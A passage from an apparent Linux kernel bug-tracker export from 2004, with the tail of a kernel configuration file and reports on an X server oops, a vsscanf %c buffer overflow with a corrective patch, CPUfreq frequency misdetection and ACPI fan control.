CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m CONFIG_IP_NF_TARGET_NETMAP=m CONFIG_IP_NF_TARGET_SAME=m # CONFIG_IP_NF_NAT_LOCAL is not set CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_NAT_TFTP=m CONFIG_IP_NF_NAT_AMANDA=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m CONFIG_IP_NF_TARGET_CLASSIFY=m CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_ARP_MANGLE=m # CONFIG_IP_NF_COMPAT_IPCHAINS is not set # CONFIG_IP_NF_COMPAT_IPFWADM is not set CONFIG_XFRM=y CONFIG_XFRM_USER=m # CONFIG_VLAN_8021Q is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # # QoS and/or fair queueing # CONFIG_NET_SCHED=y CONFIG_NET_SCH_CBQ=m CONFIG_NET_SCH_HTB=m CONFIG_NET_SCH_CSZ=m CONFIG_NET_SCH_PRIO=m CONFIG_NET_SCH_RED=m CONFIG_NET_SCH_SFQ=m CONFIG_NET_SCH_TEQL=m CONFIG_NET_SCH_TBF=m CONFIG_NET_SCH_GRED=m CONFIG_NET_SCH_DSMARK=m CONFIG_NET_SCH_INGRESS=m CONFIG_NET_QOS=y CONFIG_NET_ESTIMATOR=y CONFIG_NET_CLS=y CONFIG_NET_CLS_TCINDEX=m CONFIG_NET_CLS_ROUTE4=m CONFIG_NET_CLS_ROUTE=y CONFIG_NET_CLS_FW=m CONFIG_NET_CLS_U32=m CONFIG_NET_CLS_RSVP=m CONFIG_NET_CLS_RSVP6=m CONFIG_NET_CLS_POLICE=y # # Network testing # # CONFIG_NET_PKTGEN is not set CONFIG_NETDEVICES=y # # ARCnet devices # # CONFIG_ARCNET is not set # CONFIG_DUMMY is not set # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_NET_SB1000 is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y # CONFIG_MII is not set # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y # CONFIG_EL1 is not set # CONFIG_EL2 is not set # CONFIG_ELPLUS is not set # CONFIG_EL3 is not set # CONFIG_3C515 is not set CONFIG_VORTEX=m # CONFIG_TYPHOON is not set # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_DEPCA is not set # CONFIG_HP100 is not set CONFIG_NET_ISA=y # CONFIG_E2100 is not set # CONFIG_EWRK3 is not set # CONFIG_EEXPRESS is not set # CONFIG_EEXPRESS_PRO is not set # CONFIG_HPLAN_PLUS is not set # CONFIG_HPLAN is not set # CONFIG_LP486E is not set # CONFIG_ETH16I is not set CONFIG_NE2000=m # CONFIG_NET_PCI is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_FDDI is not set # CONFIG_PLIP is not set CONFIG_PPP=m CONFIG_PPP_FILTER=y CONFIG_PPP_ASYNC=m CONFIG_PPP_SYNC_TTY=m CONFIG_PPP_DEFLATE=m CONFIG_PPP_BSDCOMP=m # CONFIG_SLIP is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Token Ring devices # # CONFIG_TR is not set # CONFIG_NET_FC is not set # # Wan interfaces # # CONFIG_WAN is not set # # Amateur Radio support # # CONFIG_HAMRADIO is not set # # IrDA (infrared) support # # CONFIG_IRDA is not set # # Bluetooth support # CONFIG_BT=m CONFIG_BT_L2CAP=m CONFIG_BT_SCO=m CONFIG_BT_RFCOMM=m CONFIG_BT_RFCOMM_TTY=y CONFIG_BT_BNEP=m CONFIG_BT_BNEP_MC_FILTER=y CONFIG_BT_BNEP_PROTO_FILTER=y # # Bluetooth device drivers # CONFIG_BT_HCIUSB=m CONFIG_BT_USB_SCO=y CONFIG_BT_USB_ZERO_PACKET=y # CONFIG_BT_HCIUART is not set # CONFIG_BT_HCIVHCI is not set # # ISDN subsystem # CONFIG_ISDN_BOOL=y # # Old ISDN4Linux # CONFIG_ISDN=m CONFIG_ISDN_PPP=y CONFIG_ISDN_PPP_VJ=y CONFIG_ISDN_MPP=y CONFIG_ISDN_PPP_BSDCOMP=m CONFIG_ISDN_AUDIO=y CONFIG_ISDN_TTY_FAX=y # # ISDN feature submodules # CONFIG_ISDN_DRV_LOOP=m # # CAPI subsystem # # CONFIG_ISDN_CAPI is not set # # ISDN4Linux hardware drivers # # # Passive cards # CONFIG_ISDN_DRV_HISAX=m # # D-channel protocol features # CONFIG_HISAX_EURO=y # CONFIG_DE_AOC is not set # CONFIG_HISAX_NO_SENDCOMPLETE is not set # CONFIG_HISAX_NO_LLC is not set # CONFIG_HISAX_NO_KEYPAD is not set # CONFIG_HISAX_1TR6 is not set # CONFIG_HISAX_NI1 is not set CONFIG_HISAX_MAX_CARDS=8 # # HiSax supported cards # # CONFIG_HISAX_16_0 is not set CONFIG_HISAX_16_3=y # CONFIG_HISAX_TELESPCI is not set # CONFIG_HISAX_S0BOX is not set # CONFIG_HISAX_AVM_A1 is not set # CONFIG_HISAX_FRITZPCI is not set # CONFIG_HISAX_AVM_A1_PCMCIA is not set # CONFIG_HISAX_ELSA is not set # CONFIG_HISAX_IX1MICROR2 is not set # CONFIG_HISAX_DIEHLDIVA is not set # CONFIG_HISAX_ASUSCOM is not set # CONFIG_HISAX_TELEINT is not set # CONFIG_HISAX_HFCS is not set # CONFIG_HISAX_SEDLBAUER is not set # CONFIG_HISAX_SPORTSTER is not set # CONFIG_HISAX_MIC is not set # CONFIG_HISAX_NETJET is not set # CONFIG_HISAX_NETJET_U is not set # CONFIG_HISAX_NICCY is not set # CONFIG_HISAX_ISURF is not set # CONFIG_HISAX_HSTSAPHIR is not set # CONFIG_HISAX_BKM_A4T is not set # CONFIG_HISAX_SCT_QUADRO is not set # CONFIG_HISAX_GAZEL is not set # CONFIG_HISAX_HFC_PCI is not set # CONFIG_HISAX_W6692 is not set # CONFIG_HISAX_HFC_SX is not set # CONFIG_HISAX_ENTERNOW_PCI is not set CONFIG_HISAX_DEBUG=y # # Active cards # # CONFIG_ISDN_DRV_ICN is not set # CONFIG_ISDN_DRV_PCBIT is not set # CONFIG_ISDN_DRV_SC is not set # CONFIG_ISDN_DRV_ACT2000 is not set # CONFIG_HYSDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1024 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=768 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set # CONFIG_INPUT_EVDEV is not set # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y # CONFIG_SERIO_SERPORT is not set # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_INPORT is not set # CONFIG_MOUSE_LOGIBM is not set # CONFIG_MOUSE_PC110PAD is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y # CONFIG_SERIAL_8250_ACPI is not set CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_UNIX98_PTYS=y CONFIG_UNIX98_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set # CONFIG_PPDEV is not set # CONFIG_TIPAR is not set # # I2C support # CONFIG_I2C=m CONFIG_I2C_CHARDEV=m # # I2C Algorithms # # CONFIG_I2C_ALGOBIT is not set # CONFIG_I2C_ALGOPCF is not set # # I2C Hardware Bus support # # CONFIG_SCx200_ACB is not set # # I2C Hardware Sensors Chip support # # CONFIG_I2C_SENSOR is not set # # Mice # # CONFIG_BUSMOUSE is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set CONFIG_NVRAM=m CONFIG_RTC=m # CONFIG_GEN_RTC is not set # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # # Ftape, the floppy tape device driver # # CONFIG_FTAPE is not set CONFIG_AGP=y # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set CONFIG_AGP_INTEL=y # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set CONFIG_DRM_MGA=y # CONFIG_DRM_SIS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # Multimedia devices # CONFIG_VIDEO_DEV=m # # Video For Linux # # # Video Adapters # # CONFIG_VIDEO_PMS is not set # CONFIG_VIDEO_BWQCAM is not set # CONFIG_VIDEO_CPIA is not set # CONFIG_VIDEO_SAA5249 is not set # CONFIG_TUNER_3036 is not set # CONFIG_VIDEO_ZORAN is not set # CONFIG_VIDEO_SAA7134 is not set # CONFIG_VIDEO_MXB is not set # CONFIG_VIDEO_DPC is not set # CONFIG_VIDEO_HEXIUM_ORION is not set # CONFIG_VIDEO_HEXIUM_GEMINI is not set # # Radio Adapters # # CONFIG_RADIO_CADET is not set # CONFIG_RADIO_RTRACK is not set # CONFIG_RADIO_RTRACK2 is not set # CONFIG_RADIO_AZTECH is not set # CONFIG_RADIO_GEMTEK is not set # CONFIG_RADIO_GEMTEK_PCI is not set # CONFIG_RADIO_MAXIRADIO is not set # CONFIG_RADIO_MAESTRO is not set # CONFIG_RADIO_SF16FMI is not set # CONFIG_RADIO_TERRATEC is not set # CONFIG_RADIO_TRUST is not set # CONFIG_RADIO_TYPHOON is not set # CONFIG_RADIO_ZOLTRIX is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # CONFIG_VIDEO_BTCX is not set # # Graphics support # # CONFIG_FB is not set # CONFIG_VIDEO_SELECT is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y # # Sound # CONFIG_SOUND=m # # Advanced Linux Sound Architecture # # CONFIG_SND is not set # # Open Sound System # CONFIG_SOUND_PRIME=m # CONFIG_SOUND_BT878 is not set # CONFIG_SOUND_CMPCI is not set # CONFIG_SOUND_EMU10K1 is not set # CONFIG_SOUND_FUSION is not set # CONFIG_SOUND_CS4281 is not set # CONFIG_SOUND_ES1370 is not set # CONFIG_SOUND_ES1371 is not set # CONFIG_SOUND_ESSSOLO1 is not set # CONFIG_SOUND_MAESTRO is not set # CONFIG_SOUND_ICH is not set # CONFIG_SOUND_SONICVIBES is not set # CONFIG_SOUND_TRIDENT is not set # CONFIG_SOUND_MSNDCLAS is not set # CONFIG_SOUND_MSNDPIN is not set # CONFIG_SOUND_VIA82CXXX is not set CONFIG_SOUND_OSS=m # CONFIG_SOUND_TRACEINIT is not set # CONFIG_SOUND_DMAP is not set # CONFIG_SOUND_SGALAXY is not set # CONFIG_SOUND_ADLIB is not set # CONFIG_SOUND_ACI_MIXER is not set # CONFIG_SOUND_CS4232 is not set # CONFIG_SOUND_SSCAPE is not set # CONFIG_SOUND_GUS is not set # CONFIG_SOUND_VMIDI is not set # CONFIG_SOUND_TRIX is not set # CONFIG_SOUND_MSS is not set # CONFIG_SOUND_MPU401 is not set # CONFIG_SOUND_NM256 is not set # CONFIG_SOUND_MAD16 is not set # CONFIG_SOUND_PAS is not set # CONFIG_SOUND_PSS is not set CONFIG_SOUND_SB=m # CONFIG_SOUND_AWE32_SYNTH is not set # CONFIG_SOUND_WAVEFRONT is not set # CONFIG_SOUND_MAUI is not set # CONFIG_SOUND_YM3812 is not set # CONFIG_SOUND_OPL3SA1 is not set # CONFIG_SOUND_OPL3SA2 is not set # CONFIG_SOUND_YMFPCI is not set # CONFIG_SOUND_UART6850 is not set # CONFIG_SOUND_AEDSP16 is not set # CONFIG_SOUND_TVMIXER is not set # CONFIG_SOUND_KAHLUA is not set # CONFIG_SOUND_ALI5455 is not set # CONFIG_SOUND_FORTE is not set # CONFIG_SOUND_RME96XX is not set # CONFIG_SOUND_AD1980 is not set # # USB support # CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # # USB Host Controller Drivers # # CONFIG_USB_EHCI_HCD is not set # CONFIG_USB_OHCI_HCD is not set CONFIG_USB_UHCI_HCD=m # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # # USB Bluetooth TTY can only be used with disabled Bluetooth subsystem # # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set CONFIG_USB_PRINTER=m CONFIG_USB_STORAGE=m # CONFIG_USB_STORAGE_DEBUG is not set # CONFIG_USB_STORAGE_FREECOM is not set # CONFIG_USB_STORAGE_ISD200 is not set # CONFIG_USB_STORAGE_DPCM is not set # # USB Human Interface Devices (HID) # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_USB_HIDDEV is not set # # USB HID Boot Protocol drivers # # CONFIG_USB_KBD is not set # CONFIG_USB_MOUSE is not set # CONFIG_USB_AIPTEK is not set # CONFIG_USB_WACOM is not set # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_XPAD is not set # # USB Imaging devices # # CONFIG_USB_SCANNER is not set # CONFIG_USB_MICROTEK is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # CONFIG_USB_IBMCAM is not set # CONFIG_USB_KONICAWC is not set CONFIG_USB_OV511=m # CONFIG_USB_PWC is not set # CONFIG_USB_SE401 is not set # CONFIG_USB_STV680 is not set # CONFIG_USB_W9968CF is not set # # USB Network adaptors # # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not set # # USB Miscellaneous drivers # # CONFIG_USB_TIGL is not set # CONFIG_USB_LCD is not set # # File systems # CONFIG_EXT2_FS=y # CONFIG_EXT2_FS_XATTR is not set CONFIG_EXT3_FS=y CONFIG_EXT3_FS_XATTR=y # CONFIG_EXT3_FS_POSIX_ACL is not set # CONFIG_EXT3_FS_SECURITY is not set CONFIG_JBD=y # CONFIG_JBD_DEBUG is not set CONFIG_FS_MBCACHE=y CONFIG_REISERFS_FS=y # CONFIG_REISERFS_CHECK is not set CONFIG_REISERFS_PROC_INFO=y # CONFIG_JFS_FS is not set # CONFIG_XFS_FS is not set CONFIG_MINIX_FS=m CONFIG_ROMFS_FS=m CONFIG_QUOTA=y CONFIG_QFMT_V1=m CONFIG_QFMT_V2=m CONFIG_QUOTACTL=y CONFIG_AUTOFS_FS=m CONFIG_AUTOFS4_FS=m # # CD-ROM/DVD Filesystems # CONFIG_ISO9660_FS=m CONFIG_JOLIET=y # CONFIG_ZISOFS is not set CONFIG_UDF_FS=y # # DOS/FAT/NT Filesystems # CONFIG_FAT_FS=m CONFIG_MSDOS_FS=m CONFIG_VFAT_FS=m CONFIG_NTFS_FS=m # CONFIG_NTFS_DEBUG is not set # CONFIG_NTFS_RW is not set # # Pseudo filesystems # CONFIG_PROC_FS=y CONFIG_PROC_KCORE=y CONFIG_DEVPTS_FS=y # CONFIG_DEVPTS_FS_XATTR is not set CONFIG_TMPFS=y # CONFIG_HUGETLBFS is not set # CONFIG_HUGETLB_PAGE is not set CONFIG_RAMFS=y # # Miscellaneous filesystems # CONFIG_CRAMFS=m # CONFIG_VXFS_FS is not set # CONFIG_HPFS_FS is not set # CONFIG_QNX4FS_FS is not set # CONFIG_SYSV_FS is not set # CONFIG_UFS_FS is not set # # Network File Systems # CONFIG_NFS_FS=m CONFIG_NFS_V3=y CONFIG_NFSD=m CONFIG_NFSD_V3=y CONFIG_LOCKD=m CONFIG_LOCKD_V4=y CONFIG_EXPORTFS=m CONFIG_SUNRPC=m CONFIG_SMB_FS=m CONFIG_SMB_NLS_DEFAULT=y CONFIG_SMB_NLS_REMOTE="cp437" CONFIG_CIFS=m # CONFIG_NCP_FS is not set # CONFIG_CODA_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y # # Native Language Support # CONFIG_NLS=y CONFIG_NLS_DEFAULT="iso8859-1" CONFIG_NLS_CODEPAGE_437=m # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set CONFIG_NLS_CODEPAGE_850=m # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=m # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set CONFIG_NLS_ISO8859_15=m # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set CONFIG_NLS_UTF8=m # # Kernel hacking # # CONFIG_DEBUG_KERNEL is not set CONFIG_DEBUG_SPINLOCK_SLEEP=y CONFIG_FRAME_POINTER=y CONFIG_X86_EXTRA_IRQS=y CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # # CONFIG_SECURITY is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y CONFIG_CRYPTO_NULL=m CONFIG_CRYPTO_MD4=m CONFIG_CRYPTO_MD5=m CONFIG_CRYPTO_SHA1=m CONFIG_CRYPTO_SHA256=m CONFIG_CRYPTO_SHA512=m CONFIG_CRYPTO_DES=m CONFIG_CRYPTO_BLOWFISH=m CONFIG_CRYPTO_TWOFISH=m CONFIG_CRYPTO_SERPENT=m CONFIG_CRYPTO_AES=m CONFIG_CRYPTO_CAST5=m CONFIG_CRYPTO_CAST6=m CONFIG_CRYPTO_DEFLATE=m # CONFIG_CRYPTO_TEST is not set # # Library routines # CONFIG_CRC32=m CONFIG_ZLIB_INFLATE=m CONFIG_ZLIB_DEFLATE=m CONFIG_X86_BIOS_REBOOT=y CONFIG_PC=y Steps to reproduce:</t>
  </si>
  <si>
    <t>Bug from the mm subsystem involving X</t>
  </si>
  <si>
    <t>kernel.org 2.6.2</t>
  </si>
  <si>
    <t>2004-02-04 14:15 UTC</t>
  </si>
  <si>
    <t>keith mannthey</t>
  </si>
  <si>
    <t>2004-12-02 10:03 UTC</t>
  </si>
  <si>
    <t>Distribution: Red Hat Enterprise Linux AS release 3 (Taroon Update 1) Hardware Environment: IBM x445 16-way 64gig of ram Software Environment: AS3.0 update 1 with stock 2.6.2 Problem Description: The X server and the kenel do not play well. Steps to reproduce: Load AS3.0 (any flavor) and install a v2.6 kernel start X on boot. So there have been alot of X issue with Red Hat and 2.6 kernels. I managed to get the system to panic and I decide it was time to open this bug. I got this on boot up. NET: Registered protocol family 17 kjournald starting. Commit interval 5 seconds EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Freeing unused kernel memory: 296k freed ??????? Red Hat Enterprise Linux AS release 3 (Taroon Update 1) Kernel 2.6.2 on an i686 elm3a80 login: Unable to handle kernel paging request at virtual address 0264d000 printing eip: c0147af4 *pde = 00000000 Oops: 0000 [#1] CPU: 7 EIP: 0060:[&lt;c0147af4&gt;] Not tainted EFLAGS: 00013206 EIP is at remap_page_range+0x193/0x26c eax: 0264d000 ebx: 000f5200 ecx: 00000001 edx: dad0fa80 esi: 001fe000 edi: d87c9ff0 ebp: f5200000 esp: d8835ee4 ds: 007b es: 007b ss: 0068 Process X (pid: 1285, threadinfo=d8834000 task=d9474ce0) Stack: d961d580 001ff000 001ff000 40000000 f5002000 001fe000 d9578000 d961d580 401ff000 d9576508 00000000 f5200000 d961d580 00000001 c0247055 d87d62c0 401fe000 b5002000 00001000 00000027 d9388e80 00001000 c014a7fd d9388e80 Call Trace: [&lt;c0247055&gt;] mmap_mem+0x71/0xd4 [&lt;c014a7fd&gt;] do_mmap_pgoff+0x362/0x70d [&lt;c0156f65&gt;] filp_open+0x67/0x69 [&lt;c0111c4d&gt;] sys_mmap2+0x7a/0xaa [&lt;c010aced&gt;] sysenter_past_esp+0x52/0x71 Code: 8b 00 a9 00 08 00 00 74 10 89 d8 8b 54 24 4c c1 e8 14 09 ea &lt;6&gt;note: X[1285] exited with preempt_count 1 bad: scheduling while atomic! Call Trace: [&lt;c011da0a&gt;] schedule+0x6d0/0x6d5 [&lt;c0122357&gt;] __call_console_drivers+0x5b/0x5d [&lt;c0122449&gt;] call_console_drivers+0x69/0x11f [&lt;c0223ffb&gt;] rwsem_down_read_failed+0xa7/0x15a [&lt;c012513f&gt;] .text.lock.exit+0xeb/0x18c [&lt;c010be11&gt;] do_divide_error+0x0/0xfb [&lt;c011a06f&gt;] do_page_fault+0x1f8/0x561 [&lt;c0138b93&gt;] find_get_page+0x3d/0x7a [&lt;c0139db6&gt;] filemap_nopage+0x287/0x378 [&lt;c013b166&gt;] generic_file_aio_write+0x78/0xa2 [&lt;c0119e77&gt;] do_page_fault+0x0/0x561 [&lt;c010b7a9&gt;] error_code+0x2d/0x38 [&lt;c0147af4&gt;] remap_page_range+0x193/0x26c [&lt;c0247055&gt;] mmap_mem+0x71/0xd4 [&lt;c014a7fd&gt;] do_mmap_pgoff+0x362/0x70d [&lt;c0156f65&gt;] filp_open+0x67/0x69 [&lt;c0111c4d&gt;] sys_mmap2+0x7a/0xaa [&lt;c010aced&gt;] sysenter_past_esp+0x52/0x71 Red Hat Enterprise Linux AS release 3 (Taroon Update 1) Kernel 2.6.2 on an i686 My X version is XFree86-4.3.0-44.EL Also if I do proc related thing on the pid (ps top ...) I hang the login session (strace shows I don't return from a read on what I suppose is the X pid) Any thoughts, comments or suggestions are wanted.</t>
  </si>
  <si>
    <t>Improper handling of %c in function vsscanf in lib/vsprintf.c</t>
  </si>
  <si>
    <t>2004-02-05 04:29 UTC</t>
  </si>
  <si>
    <t>Giorgio Biagetti</t>
  </si>
  <si>
    <t>2004-03-29 10:14 UTC</t>
  </si>
  <si>
    <t>Problem Description: The "%c" in sscanf actually reads and writes one extra character (i.e. 2 characters insted of just one), and may thus easily overflow caller's buffer. Also affects 2.4 tree, even if there "%c" seems not to be used at all. Proposed patch against 2.6.1: --- vsprintf.c.orig Thu Feb 5 13:04:02 2004 +++ vsprintf.c Thu Feb 5 13:04:34 2004 @@ -599,7 +599,7 @@ field_width = 1; do { *s++ = *str++; - } while(field_width-- &gt; 0 &amp;&amp; *str); + } while(--field_width &gt; 0 &amp;&amp; *str); num++; } continue;</t>
  </si>
  <si>
    <t>CPUfreq + Athlon Mobile XP 1800+ powernow : bad frequency detection</t>
  </si>
  <si>
    <t>2.6.1 and 2.6.2</t>
  </si>
  <si>
    <t>2004-02-05 04:40 UTC</t>
  </si>
  <si>
    <t>Pascal SCLAFER</t>
  </si>
  <si>
    <t>2007-05-17 14:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Redhat 9 Hardware Environment: Acer Aspire 1310 with Ahlon Mobile XP 1800+ Software Environment: Kernel 2.6.2 Problem Description: I have an Athlon XP 1800+ which can run at 1500 Mhz. I've compiled a 2.6 kernel with CPUfreq. CPUfreq detects that the maximum frequency for my processor is 997 Mhz and I can't set the frequency upper than 997 Mhz. If I don't compile the CPUFreq or the powernow support in the kernel, I've no problem and /proc/cpuinfo says me the good frequency (I haven't tried to compile the CPUFreq as a module) this is an extract of my /var/log/dmesg: powernow: AMD K7 CPU detected. powernow: PowerNOW! Technology present. Can scale: frequency and voltage. powernow: Found PSB header at c00e5ed0 powernow: Table version: 0x12 powernow: Flags: 0x0 (Mobile voltage regulator) powernow: Settling Time: 100 microseconds. powernow: Has 1 PST tables. (Only dumping ones relevant to this CPU). powernow: PST:0 (@c00e5ee0) powernow: cpuid: 0x781 fsb: 133 maxFID: 0x1 startvid: 0xb powernow: FID: 0x4 (5.0x [665MHz]) VID: 0xc (1.400V) powernow: FID: 0x6 (6.0x [798MHz]) VID: 0xc (1.400V) powernow: FID: 0x8 (7.0x [931MHz]) VID: 0xc (1.400V) powernow: FID: 0x9 (7.5x [997MHz]) VID: 0xc (1.400V) powernow: FID: 0x9 (7.5x [997MHz]) VID: 0xc (1.400V) powernow: Minimum speed 665 MHz. Maximum speed 997 MHz. Steps to reproduce: Compile CPUfreq and powernow support in the kernel and boot.</t>
  </si>
  <si>
    <t>no fan control</t>
  </si>
  <si>
    <t>Margit Schubert-While</t>
  </si>
  <si>
    <t>2004-11-18 11:55 UTC</t>
  </si>
  <si>
    <t>Distribution: Suse 9.0 Hardware Environment: Kapok/Clevo 8500V P3 1Ghz/256 MB Laptop (ca. 1999) (No BIOS support anymore) Software Environment: Problem Description: Fan is not kicking in or out. Case 1: A real "cold" boot where fan is not running. Temperature climbs without the fan kicking in : ----------- /proc/acpi/thermal_zone/THM0 --------- &lt;not supported&gt; &lt;polling disabled&gt; state: active[1] temperature: 62 C critical (S5): 80 C active[0]: 55 C: devices=0xcfc5c80c active[1]: 45 C: devices=0xcfc5c96c Case 2: A warm boot where fan is running. The fan never stops. A cat /proc/acpi/thermal_zone/THM0/* always kicks in/out the fan. Boot.msg, dmidecode and config follow. ------ boot.msg -------- Inspecting /boot/System.map-2.6.2 Loaded 26117 symbols from /boot/System.map-2.6.2. Symbols match kernel version 2.6.2. No module symbols loaded - kernel modules not enabled. klogd 1.4.1, log source = ksyslog started. &lt;4&gt;Linux version 2.6.2 (root@marglap) (gcc version 3.3.1 (SuSE Linux)) #1 Wed Feb 4 14:01:23 CET 2004 &lt;6&gt;BIOS-provided physical RAM map: &lt;4&gt; BIOS-e820: 0000000000000000 - 000000000009f800 (usable) &lt;4&gt; BIOS-e820: 000000000009f800 - 00000000000a0000 (reserved) &lt;4&gt; BIOS-e820: 00000000000ea800 - 0000000000100000 (reserved) &lt;4&gt; BIOS-e820: 0000000000100000 - 000000000fff0000 (usable) &lt;4&gt; BIOS-e820: 000000000fff0000 - 000000000ffffc00 (ACPI data) &lt;4&gt; BIOS-e820: 000000000ffffc00 - 0000000010000000 (ACPI NVS) &lt;4&gt; BIOS-e820: 00000000fffe0000 - 0000000100000000 (reserved) &lt;5&gt;255MB LOWMEM available. &lt;4&gt;On node 0 totalpages: 65520 &lt;4&gt; DMA zone: 4096 pages, LIFO batch:1 &lt;4&gt; Normal zone: 61424 pages, LIFO batch:14 &lt;4&gt; HighMem zone: 0 pages, LIFO batch:1 &lt;6&gt;DMI 2.3 present. &lt;6&gt;ACPI: RSDP (v000 